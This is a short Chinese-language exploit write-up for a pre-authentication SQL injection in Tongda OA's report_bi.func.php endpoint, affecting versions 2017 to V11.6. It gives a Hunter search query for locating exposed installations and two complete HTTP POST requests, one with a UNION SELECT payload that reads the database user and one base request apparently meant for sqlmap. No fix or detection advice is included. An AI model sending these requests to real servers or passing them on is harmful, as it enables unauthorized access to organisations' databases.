登录 白背景

通达OA report_bi存在前台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

  • 通达OA2017-通达OA V11.6

三、资产测绘

  • hunterapp.name="通达 OA"
  • 特征

image.png

四、漏洞复现

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Go-http-client/1.1
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_POST[dataset_id]=efgh'-@`'`)union select 1,2,user()#'&action=get_link_info&

image.png
sqlmap

POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Go-http-client/1.1
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_POST[dataset_id]=efgh'-@`'`)&action=get_link_info&

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/te77ofw8ps31upr1